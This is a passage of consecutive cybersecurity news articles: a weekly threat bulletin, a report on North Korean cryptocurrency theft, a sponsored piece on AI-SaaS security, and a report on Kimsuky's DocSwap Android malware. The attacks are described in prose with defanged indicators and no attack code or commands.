To check for any signs of compromise, users can navigate to Settings -> Linked Devices. RuTube malware lure RuTube Becomes a Vector for Malware Distribution Bad actors have been observed hosting videos on the Russian video-sharing platform RuTube that advertise cheats for Roblox, tricking users into clicking on links that lead to Trojan and stealer malware like Salat Stealer. It’s worth noting that similar tactics have been widespread on YouTube. Legacy cipher retired Microsoft Plans RC4 Deprecation Microsoft has announced that it’s deprecating RC4 (Rivest Cipher 4) encryption in Kerberos to strengthen Windows authentication.
By mid-2026, domain controller defaults will be updated for the Kerberos Key Distribution Center (KDC) on Windows Server 2008 and later to only allow AES-SHA1 encryption. RC4 will be disabled by default and only used in scenarios where a domain administrator explicitly configures an account or the KDC to use it. “RC4, once a staple for compatibility, is susceptible to attacks like Kerberoasting that can be used to steal credentials and compromise networks,” the company said. “It is crucial to discontinue using RC4.” The decision also comes after U.S.
Senator Ron Wyden called on the U.S. Federal Trade Commission (FTC) to investigate the company over its use of the obsolete cipher. IMSI catcher arrests Serbia Detains 2 Chinese Nationals for Smishing Attacks Serbian police have detained two Chinese nationals for driving around with an improvised IMSI catcher in their car that functioned as a fake mobile base station. The pair is alleged to have sent SMS phishing messages that tricked people into visiting phishing sites that masqueraded as mobile operators, government portals, and large companies to collect payment card details.
The captured card data was later abused overseas to pay for goods and services. The names of the arrested individuals were not disclosed. But they are suspected to be part of an organized criminal group. Exposed AI servers risk About 1K Exposed MCP Servers Found New research from Bitsight has found roughly 1,000 Model Context Protocol (MCP) servers exposed on the internet with no authorization in place and leaking sensitive data.
Some of them could allow management of a Kubernetes cluster and its pods, access to a Customer Relationship Management (CRM) tool, send WhatsApp messages, and even achieve remote code execution. “While Anthropic authored the MCP specification, it’s not their job to enforce how every server handles authorization,” Bitsight said . “Because authorization is optional, it’s easy to skip it when moving from a demo to a real-world deployment, potentially exposing sensitive tools or data. Many MCP servers are designed for local use, but once one is exposed over HTTP, the attack surface expands dramatically.” To counter the risk, it’s essential that users do not expose MCP servers unless it’s absolutely necessary and implement OAuth protections for authorization.
The development comes as exposure management company Intruder revealed that a scan of approximately 5 million single-page applications found more than 42,000 tokens exposed in their code. The tokens span 334 types of secrets. Fake tax scam deploys RATs Tax-Themed Phishing Campaign Delivers RATs A phishing campaign impersonating the Income Tax Department of India has been found using themes related to alleged tax irregularities to create a false sense of urgency and deceive users into clicking on malicious links that deploy legitimate remote access tools like LogMeIn Resolve (formerly GoTo Resolve) that grant attackers unauthorized control over compromised systems. “The campaign delivered a two-stage malware chain consisting of a shellcode-based RAT loader packaged in a ZIP file and a rogue remote administration executable disguised as a GoTo Resolve updater,” Raven AI said .
“Traditional Secure Email Gateway defenses failed to detect these messages because the sender authenticated correctly, the attachments were password-protected, and the content imitated real government communication.” CBI busts SMS scam ring India’s CBI Dismantles Phishing SMS Factory India’s Central Bureau of Investigation (CBI) said it disrupted a large cyber fraud setup that was being used to send phishing messages across the country with the goal of tricking people into bogus schemes like fake digital arrests, loan scams, and investment frauds. Three people have been arrested in connection with the case under Operation Chakra V . The investigation identified an organized cyber gang operating from the National Capital Region (NCR) and the Chandigarh area that managed to obtain around 21,000 SIM cards in violation of the Department of Telecommunications (DoT) rules. “This gang was providing bulk SMS services to cyber criminals,” the CBI said .
“It was found that even foreign cyber criminals were using this service to cheat Indian citizens. These SIM cards were controlled through an online platform to send bulk messages. The messages offered fake loans, investment opportunities, and other financial benefits, with the aim of stealing personal and banking details of innocent people.” Separately, the agency also filed charges against 17 individuals, including four foreign nationals and 58 companies, in connection with an organized transnational cyber fraud network operating across multiple States in India. “The cyber criminals adopted a highly layered and technology-driven modus operandi, involving the use of Google advertisements, bulk SMS campaigns, SIM box-based messaging systems, cloud infrastructure, fintech platforms, and multiple mule bank accounts,” the CBI said .
“Each stage of the operation—from luring victims to collection and movement of funds—was deliberately structured to conceal the identities of the actual controllers and evade detection by law enforcement agencies.” APT phishing across Europe Russian Hackers Phish the Baltics and the Balkans StrikeReady Labs has disclosed details of a phishing campaign that has targeted Transnistria’s governing body with a credential phishing email attachment by spoofing the Pridnestrovian Moldavian Republic. The HTML attachment shows a blurred decoy document along with a pop-up that prompts victims to enter their credentials. The entered information is transmitted to an attacker-controlled server. The campaign is believed to be active since at least 2023.
Other targets likely include entities in Ukraine, Bosnia and Herzegovina, Macedonia, Montenegro, Spain, Lithuania, Bulgaria, and Moldova. Fake CAPTCHA delivers malware ClickFix Attacks Use Finger Tool A new wave of ClickFix attacks has leveraged fake CAPTCHA checks that trick users into pasting in the Windows Run dialog, which runs the finger.exe tool to retrieve malicious PowerShell code. The attacks have been attributed to clusters tracked as KongTuke and SmartApeSG. The decades-old finger command is used to look up information about local and remote users on Unix and Linux systems via the Finger protocol.
It was later added to Windows systems. In another ClickFix attack detected by Point Wild, phony browser notifications prompt users to click “How to fix” or copy-paste a PowerShell command that leads to the deployment of DarkGate malware via a malicious HTA file. Google service abused Phishing Attack Abuses Google Application Integration Service for Credential Theft Threat actors are abusing Google’s Application Integration service to send phishing emails from authentic @google.com addresses and bypass SPF, DKIM, and DMARC checks. The technique, according to xorlab, is being used in the wild to target organizations with highly convincing lures mimicking new sign-in alerts for Google accounts, effectively deceiving them into clicking on suspicious links.
“To evade detection, attackers use multi-hop redirect chains that bounce through multiple legitimate services,” the company said . “Each hop uses trusted infrastructure — Google, Microsoft, AWS – making the attack difficult to detect or block at any single point. Regardless of the entry point, victims eventually land on the Microsoft 365 login page, revealing the attackers’ primary target: M365 credentials.” AI-driven ICS scans Reconnaissance Efforts Target Modbus Devices Cato Networks said it observed large-scale reconnaissance and exploitation attempts targeting Modbus devices, including string monitoring boxes that directly control solar panel output. “In such cases, a threat actor with nothing more than an internet connection and a free tool could issue a simple command, ‘SWITCH OFF,’ cutting power on a bright, cloudless day,” the company said .
“What once required time, patience, and manual skill can now be scaled and accelerated through automation. With the rise of agentic AI tools, attackers can now automate reconnaissance and exploitation, reducing the time needed to execute such attacks from days to just minutes.” Ransomware joins exploit wave React2Shell Exploited in Ransomware Attacks The fallout from React2Shell (CVE-2025-55182) has continued to spread as multiple threat actors have jumped on the exploitation bandwagon to distribute a wide array of malware . The proliferation of public exploits and stealth backdoors has been complemented by attacks of varying origins and motivations, with cybersecurity firm S-RM revealing that the vulnerability was used as an initial access vector in a Weaxor ransomware attack on December 5, 2025. “This marks a shift from previously reported exploitation,” S-RM said .
“It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion.” Weaxor is assessed to be a rebrand of Mallox ransomware. The ransomware binary was dropped and executed on the system within less than one minute of initial access, indicating that this was likely part of an automated campaign. According to Palo Alto Networks Unit 42, more than 60 organizations have been impacted by incidents exploiting the vulnerability. Microsoft said it found “several hundred machines across a diverse set of organizations” that were compromised via React2Shell.
The patterns behind these stories keep repeating — faster code, smarter lures, and fewer pauses between discovery and abuse. Each case adds another piece to the wider map of how attacks adapt when attention fades. Next week will bring a fresh set of shifts, but for now, these are the signals worth noting. Stay sharp, connect the dots, and watch what changes next.
That’s all for this edition of the ThreatsDay Bulletin — the pulse of what’s moving beneath the surface every Thursday. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
North Korea-Linked Hackers Steal $2.02 Billion in 2025, Leading Global Crypto Theft
Threat actors with ties to the Democratic People’s Republic of Korea (DPRK or North Korea) have been instrumental in driving a surge in global cryptocurrency theft in 2025, accounting for at least $2.02 billion out of more than $3.4 billion stolen from January through early December. The figure represents a 51% increase year-over-year and $681 million more than 2024, when the threat actors stole $1.3 billion, according to Chainalysis’ Crypto Crime Report shared with The Hacker News. “This marks the most severe year on record for DPRK crypto theft in terms of value stolen, with DPRK attacks also accounting for a record 76% of all service compromises,” the blockchain intelligence company said . “Overall, 2025’s numbers bring the lower-bound cumulative estimate for cryptocurrency funds stolen by the DPRK to $6.75 billion.” The February compromise of cryptocurrency exchange Bybit alone is responsible for $1.5 billion of the $2.02 billion plundered by North Korea.
The attack was attributed to a threat cluster known as TraderTraitor (aka Jade Sleet and Slow Pisces). An analysis published by Hudson Rock earlier this month linked a machine infected with Lumma Stealer to infrastructure associated with the Bybit hack based on the presence of the email address “ trevorgreer9312@gmail[.]com .” The cryptocurrency thefts are part of a broader series of attacks conducted by the North Korea-backed hacking group called Lazarus Group over the past decade. The adversary is also believed to be involved in the theft of $36 million worth of cryptocurrency from South Korea’s largest cryptocurrency exchange, Upbit , last month. Lazarus Group is affiliated with Pyongyang’s Reconnaissance General Bureau (RGB).
It’s estimated to have siphoned no less than $200 million from over 25 cryptocurrency heists between 2020 and 2023. The nation-state adversary is one of the most prolific hacking groups that also has a track record of orchestrating a long-running campaign referred to as Operation Dream Job , in which prospective employees working in defense, manufacturing, chemical, aerospace, and technology sectors are approached via LinkedIn or WhatsApp with lucrative job opportunities to trick them into downloading and running malware such as BURNBOOK, MISTPEN , and BADCALL , the last of which also comes in a Linux version . The end goal of these efforts is two-pronged: to collect sensitive data and generate illicit revenue for the regime in violation of international sanctions imposed on the country. A second approach adopted by North Korean threat actors is to embed information technology (IT) workers inside companies across the world under false pretenses , either in an individual capacity or through front companies like DredSoftLabs and Metamint Studio that are set up for this purpose.
This also includes gaining privileged access to crypto services and enabling high‑impact compromises. The fraudulent operation has been nicknamed Wagemole. “Part of this record year likely reflects an expanded reliance on IT worker infiltration at exchanges, custodians, and Web3 firms, which can accelerate initial access and lateral movement ahead of large‑scale theft,” Chainalysis said. Regardless of the method used, the stolen funds are routed through Chinese-language money movement and guarantee services, as well as cross-chain bridges, mixers, and specialized marketplaces like Huione to launder the proceeds.
What’s more, the pilfered assets follow a structured, multi-wave laundering pathway that unfolds over approximately 45 days following the hacks - Wave 1: Immediate Layering (Days 0-5) , which involves immediate distancing of funds from the theft source using DeFi protocols and mixing services Wave 2: Initial Integration (Days 6-10) , which involves shifting the funds to cryptocurrency exchanges, second-tier mixing services, and cross-chain bridges like XMRt Wave 3: Final Integration (Days 20-45) , which involves using services that facilitate ultimate conversion to fiat currency or other assets “Their heavy use of professional Chinese-language money laundering services and over-the-counter (OTC) traders suggests that DPRK threat actors are tightly integrated with illicit actors across the Asia-Pacific region, and is consistent with Pyongyang’s historical use of China-based networks to gain access to the international financial system,” the company said. The disclosure comes as Minh Phuong Ngoc Vong , a 40-year-old Maryland man, has been sentenced to 15 months in prison for his role in the IT worker scheme by allowing North Korean nationals based in Shenyang, China, to use his identity to land jobs at several U.S. government agencies, per the U.S. Department of Justice (DoJ).
Between 2021 and 2024, Vong used fraudulent misrepresentations to obtain employment with at least 13 different U.S. companies, including landing a contract at the Federal Aviation Administration (FAA). In all, Vong was paid more than $970,000 in salary for software development services that were carried out by overseas conspirators. “Vong conspired with others, including John Doe, aka William James, a foreign national living in Shenyang, China, to defraud U.S.
companies into hiring Vong as a remote software developer,” the DoJ said . “After securing these jobs through materially false statements about his education, training, and experience, Vong allowed Doe and others to use his computer access credentials to perform the remote software development work and receive payment for that work.” The IT worker scheme appears to be undergoing a shift in strategy, with DPRK-linked actors increasingly acting as recruiters to enlist collaborators through platforms like Upwork and Freelancer to further scale the operations. “These recruiters approach targets with a scripted pitch, requesting ‘collaborators’ to help bid on and deliver projects. They provide step-by-step instructions for account registration, identity verification, and credential sharing,” Security Alliance said in a report published last month.
“In many cases, victims ultimately surrender full access to their freelance accounts or install remote-access tools such as AnyDesk or Chrome Remote Desktop. This enables the threat actor to operate under the victim’s verified identity and IP address, allowing them to bypass platform verification controls and conduct illicit activity undetected.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
The Case for Dynamic AI-SaaS Security as Copilots Scale
Within the past year, artificial intelligence copilots and agents have quietly permeated the SaaS applications businesses use every day. Tools like Zoom, Slack, Microsoft 365, Salesforce, and ServiceNow now come with built-in AI assistants or agent-like features. Virtually every major SaaS vendor has rushed to embed AI into their offerings. The result is an explosion of AI capabilities across the SaaS stack, a phenomenon of AI sprawl where AI tools proliferate without centralized oversight.
For security teams, this represents a shift. As these AI copilots scale up in use, they are changing how data moves through SaaS. An AI agent can connect multiple apps and automate tasks across them, effectively creating new integration pathways on the fly. An AI meeting assistant might automatically pull in documents from SharePoint to summarize in an email, or a sales AI might cross-reference CRM data with financial records in real time.
These AI data connections form complex, dynamic pathways that traditional static app models never had. When AI Blends In - Why Traditional Governance Breaks This shift has exposed a fundamental weakness in legacy SaaS security and governance. Traditional controls assumed stable user roles, fixed app interfaces, and human-paced changes. However, AI agents break those assumptions.
They operate at machine speed, traverse multiple systems, and often wield higher-than-usual privileges to perform their job. Their activity tends to blend into normal user logs and generic API traffic, making it hard to distinguish an AI’s actions from a person’s. Consider Microsoft 365 Copilot: when this AI fetches documents that a given user wouldn’t normally see, it leaves little to no trace in standard audit logs. A security admin might see an approved service account accessing files, and not realize it was Copilot pulling confidential data on someone’s behalf.
Similarly, if an attacker hijacks an AI agent’s token or account, they can quietly misuse it. Moreover, AI identities don’t behave like human users at all. They don’t fit neatly into existing IAM roles, and they often require very broad data access to function (far more than a single user would need). Traditional data loss prevention tools struggle because once an AI has wide read access, it can potentially aggregate and expose data in ways no simple rule would catch.
Permission drift is another challenge. In a static world, you might review integration access once a quarter. But AI integrations can change capabilities or accumulate access quickly, outpacing periodic reviews. Access often drifts silently when roles change or new features turn on.
A scope that seemed safe last week might quietly expand (e.g., an AI plugin gaining new permissions after an update) without anyone realizing. All these factors mean static SaaS security and governance tools are falling behind. If you’re only looking at static app configurations, predefined roles, and after-the-fact logs, you can’t reliably tell what an AI agent actually did, what data it accessed, which records it changed, or whether its permissions have outgrown policy in the interim. A Checklist for Securing AI Copilots and Agents Before introducing new tools or frameworks, security teams should pressure-test their current posture.
Question ✓ Do we know every copilot, agent, and integration running in our SaaS environment? Do we know what each one can access right now? Can we see what each one actually did across apps? Can we spot access drift as it happens?
If something goes wrong, can we reconstruct what happened end to end? Can we block risky actions in real time, not just alert after? Do we know which OAuth tokens exist and what scopes they grant? Can we tell human activity from agent activity in logs?
If several of these questions are difficult for you to answer, it’s a signal that static SaaS security models are no longer sufficient for AI tools. Dynamic AI-SaaS Security - Guardrails for AI Apps To address these gaps, security teams are beginning to adopt what can be described as dynamic AI-SaaS security. In contrast to static security (which treats apps as siloed and unchanging), dynamic AI-SaaS security is a policy driven, adaptive guardrail layer that operates in real-time on top of your SaaS integrations and OAuth grants. Think of it as a living security layer that understands what your copilots and agents are doing moment-to-moment, and adjusts or intervenes according to policy.
Dynamic AI-SaaS security monitors AI agent activity across all your SaaS apps, watching for policy violations, abnormal behavior, or signs of trouble. Rather than relying on yesterday’s checklist of permissions, it learns and adapts to how an agent is actually being used. A dynamic security platform will track an AI agent’s effective access. If the agent suddenly touches a system or dataset outside its usual scope, it can flag or block that in real-time.
It can also detect configuration drift or privilege creep instantly and alert teams before an incident occurs. Another hallmark of dynamic AI-SaaS security is visibility and auditability. Because the security layer mediates the AI’s actions, it keeps a detailed record of what the AI is doing across systems. Every prompt, every file accessed, and every update made by the AI can be logged in structured form.
This means that if something does go wrong, say an AI makes an unintended change or accesses a forbidden file, the security team can trace exactly what happened and why. Dynamic AI-SaaS security platforms leverage automation and AI themselves to keep up with the torrent of events. They learn normal patterns of agent behavior and can prioritize true anomalies or risks so that security teams aren’t drowning in alerts. They might correlate an AI’s actions across multiple apps to understand the context and flag only genuine threats.
This proactive stance helps catch issues that traditional tools would miss, whether it’s a subtle data leak via an AI or a malicious prompt injection causing an agent to misbehave. Conclusion - Embracing Adaptive Guardrails As AI copilots take on a bigger role in our SaaS workflows, security teams should think about evolving their strategy in parallel. The old model of set-and-forget SaaS security, with static roles and infrequent audits, simply can’t keep up with the speed and complexity of AI activity. The case for dynamic AI-SaaS security is ultimately about maintaining control without stifling innovation.
With the right dynamic security platform in place, organizations can confidently adopt AI copilots and integrations, knowing they have real-time guardrails to prevent misuse, catch anomalies, and enforce policy. Dynamic AI-SaaS security platforms (like Reco) are emerging to deliver these capabilities out-of-the-box, from monitoring of AI privileges to automated incident response. They act as that missing layer on top of OAuth and app integrations, adapting on the fly to what agents are doing and ensuring nothing falls through the cracks. Figure 1: Reco’s generative AI application discovery For security leaders watching the rise of AI copilots, SaaS security can no longer be static.
By embracing a dynamic model, you equip your organization with living guardrails that let you ride the AI wave safely. It’s an investment in resilience that will pay off as AI continues to transform the SaaS ecosystem. Interested in how dynamic AI-SaaS security could work for your organization? Consider exploring platforms like Reco that are built to provide this adaptive guardrail layer.
Request a Demo: Get Started With Reco . Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App
The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). “The threat actor leveraged QR codes and notification pop-ups to lure victims into installing and executing the malware on their mobile devices,” ENKI said . “The malicious app decrypts an embedded encrypted APK and launches a malicious service that provides RAT capabilities.” “Since Android blocks apps from unknown sources and displays security warnings by default, the threat actor claims the app is a safe, official release to trick victims into ignoring the warning and installing the malware.” According to the South Korean cybersecurity company, some of these artifacts masquerade as package delivery service apps. It’s being assessed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps.
A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status. The QR code is engineered to redirect the user to a “tracking.php” script that implements server-side logic to check the User-Agent string of the browser and display a message urging them to install a security module under the guise of verifying their identity due to supposed “international customs security policies.” Should the victim proceed to install the app, an APK package (“SecDelivery.apk”) is downloaded from the server (“27.102.137[.]181”). The APK file then decrypts and loads an encrypted APK embedded into its resources to launch the new version of DocSwap, but not before ascertaining that it has obtained the necessary permission to read and manage external storage, access the internet, and install additional packages. “Once it confirms all permissions, it immediately registers the MainService of the newly loaded APK as ‘com.delivery.security.MainService,’” ENKI said.
“Simultaneously with service registration, the base application launches AuthActivity. This activity masquerades as an OTP authentication screen and verifies the user’s identity using a delivery number.” The shipment number is hard-coded within the APK as “742938128549,” and is likely delivered alongside the malicious URL during the initial access phase. Once the user enters the provided delivery number, the application is configured to generate a random six-digit verification code and display it as a notification, following which they are prompted to input the generated code. As soon as the code is provided, the app opens a WebView with the legitimate URL “www.cjlogistics[.]com/ko/tool/parcel/tracking,” while, in the background, the trojan connects to an attacker-controlled server (“27.102.137[.]181:50005”) and receive as many as 57 commands that allow it to log keystrokes, capture audio, start/stop camera recording perform file operations, run commands, upload/download files, and gather location, SMS messages, contacts, call logs, and a list of installed apps.
ENKI said it also discovered two other samples disguised as a P2B Airdrop app and a trojanized version of a legitimate VPN program called BYCOM VPN (“com.bycomsolutions.bycomvpn”) that’s available on the Google Play Store and developed by an Indian IT services company named Bycom Solutions. “This indicates that the threat actor injected malicious functionality into the legitimate APK and repackaged it for use in the attack,” the security company added. Further analysis of the threat actor infrastructure has uncovered phishing sites mimicking South Korean platforms like Naver and Kakao that seek to capture users’ credentials. These sites, in turn, have been found to share overlaps with a prior Kimsuky credential harvesting campaign targeting Naver users.
“The executed malware launches a RAT service, similarly to past cases but demonstrates evolved capabilities, such as using a new native function to decrypt the internal APK and incorporating diverse decoy behaviors,” ENKI said. Kimsuky Drops KimJongRAT Via Phishing Attack The disclosure comes as the Kimsuky hacking group has been attributed to a phishing campaign that uses tax-themed lures to distribute a Windows remote access trojan known as KimJongRAT using ZIP file attachments containing a Windows shortcut (LNK). The LNK file is disguised as a PDF document, which, when opened, uses “mshta.exe” to execute an HTML Application (HTA) payload. The HTA malware acts as a loader to download and display a decoy PDF while simultaneously dropping the RAT payload to periodically collect and transmit user information.
This includes system metadata, as well as information from web browsers, dozens of cryptocurrency wallet extensions, Telegram, Discord, and NPKI/GPKI certificates , a digital signature certificate service used for online banking in South Korea. According to an organizational assessment released by DTEX, Kimsuky is part of the Reconnaissance General Bureau (RGB), which also houses various threat clusters responsible for conducting cryptocurrency heists and cyber espionage – an umbrella group widely referred to as the Lazarus Group . Kimsuky and Lazarus Group are known to demonstrate high levels of coordination, sharing infrastructure and attack intelligence despite their disparate roles in North Korea’s cyber apparatus. In at least one incident targeting a South Korean blockchain company, Kimusky is believed to have first gained initial access via a phishing attack and gathered data of interest using tools like KLogEXE and FPSpy .
The next phase commenced when Lazarus Group took over by exploiting CVE-2024-38193 , a now-patched privilege escalation flaw in the Windows Ancillary Function Driver (AFD.sys) for WinSock, to deliver additional payloads like FudModule, InvisibleFerret, and BeaverTail to steal private keys and transaction records from blockchain wallets, and ultimately siphon digital assets worth millions of dollars within a span of 48 hours. “Although Kimsuky and Lazarus have different tactical focuses, they both possess ‘killer weapons’ capable of breaching top-tier defenses, and their technical characteristics are ‘precise and ruthless,’” Purple Team Security Research said , describing the two clusters as a “dual-engine” approach for intelligence gathering and financial gain. “The two organizations do not operate in isolation. Kimsuky’s stolen corporate network maps and access information are synchronized in real-time to Lazarus’s attack platform.” (The story was updated after publication to include other related Kimsuky campaigns documented in recent weeks.) Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.